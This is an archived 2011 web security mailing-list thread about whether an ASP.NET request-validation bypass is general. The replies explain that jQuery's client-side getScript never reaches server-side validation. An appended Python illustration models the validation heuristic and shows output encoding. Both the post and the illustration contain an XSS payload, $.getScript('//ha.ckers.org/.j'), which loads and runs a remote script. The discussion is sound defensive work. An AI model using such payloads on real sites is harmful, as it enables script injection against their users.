[WEB SECURITY] ASP.NET Request Validator Bypass?

Arian J. Evans arian.evans at anachronic.com
Sat Feb 19 16:52:08 EST 2011


Exactly. ASP.NET requestValidators are a server-side control.

jQuery getScript is designed to be used client-side and fetch a script
to build or interface with the DOM. Therefore the server-side controls
would never see it.

---
Arian Evans



On Sat, Feb 19, 2011 at 10:04 AM, steve jensen <sjensen1207 at hotmail.com> wrote:
> If this jQuery .getScript request is only performed client-side, then it
> wouldn't even be sent to the server-side ASP.NET XSS validation to be
> bypassed.
>
> ________________________________
> Date: Sat, 19 Feb 2011 15:39:06 +0000
> From: ryandewhurst at gmail.com
> To: websecurity at webappsec.org
> Subject: [WEB SECURITY] ASP.NET Request Validator Bypass?
>
> Hi,
>
> Recently on a client test I was able to bypass the ASP.NET Request Validator
> by leveraging the jQuery library which was included in the page. I am mainly
> a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal.
>
> I was wondering if anyone could confirm whether my bypass affects all
> ASP.NET installations or whether or not this particular client had it
> configured incorrectly.
>
> I used the following jQuery function to bypass the filter:
> $.getScript('//ha.ckers.org/.j');
>
> Thanks,
> Ryan
>
> Ryan Dewhurst
>
> blog www.ethicalhack3r.co.uk
> projects www.dvwa.co.uk | www.webwordcount.com
> twitter www.twitter.com/ethicalhack3r
>
> _______________________________________________
> The Web Security Mailing List
> WebSecurity RSS Feed http://www.webappsec.org/rss/websecurity.rss
> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
> WASC on Twitter http://twitter.com/wascupdates
> websecurity at lists.webappsec.org
> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
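An added illustration (not from any poster in this thread) of the point the replies make: ASP.NET request validation is a server-side heuristic run over inbound request values only, so a script the browser fetches on its own via getScript never reaches it, and a request value that contains none of the markers the heuristic looks for passes it as well. The `DANGEROUS` pattern is a simplified model assumed for this example, not the framework's source; `js_string_encode` and `render_script` are assumed helper names showing the output-side encoding the application itself must apply.

```python
import re

# Simplified model (an assumption for this example) of the heuristic ASP.NET
# request validation applies to inbound form, query-string and cookie values:
# reject when '<' is followed by a letter, '!', '/' or '?', or on '&#'.
DANGEROUS = re.compile(r"<[A-Za-z!/?]|&#")


def is_dangerous_string(value: str) -> bool:
    """True when the request-validation heuristic would reject the value."""
    return DANGEROUS.search(value) is not None


def validate_request(params: dict) -> list:
    """Return the names of request parameters the heuristic would reject.

    Only inbound request data is inspected. Whatever the browser does after
    the response arrives (such as jQuery's getScript loading a script from a
    third-party host) sends nothing to this server, so it is never seen here.
    """
    return [name for name, value in params.items() if is_dangerous_string(value)]


def js_string_encode(value: str) -> str:
    """Encode a value for embedding inside a JavaScript string literal.

    Every character outside [A-Za-z0-9] becomes a \\uXXXX escape, so the value
    can neither close the literal nor introduce a tag. This output-side
    encoding is the control that prevents script injection; request
    validation does not replace it.
    """
    return "".join(
        ch if (ch.isascii() and ch.isalnum()) else f"\\u{ord(ch):04x}"
        for ch in value
    )


def render_script(value: str) -> str:
    """Embed a user-controlled value in an inline script the safe way."""
    return f"<script>var q = '{js_string_encode(value)}';</script>"


# Constructed request: 'q' carries the getScript call quoted in the thread,
# 'page' carries a value the heuristic does reject.
SAMPLE_REQUEST = {"q": "$.getScript('//ha.ckers.org/.j')", "page": "<b>x"}

if __name__ == "__main__":
    print("rejected by heuristic:", validate_request(SAMPLE_REQUEST))
    print(render_script(SAMPLE_REQUEST["q"]))
```

Running it shows only `page` rejected while the getScript value passes untouched, and `render_script` neutralises it anyway because the encoding is done at output time in the right context.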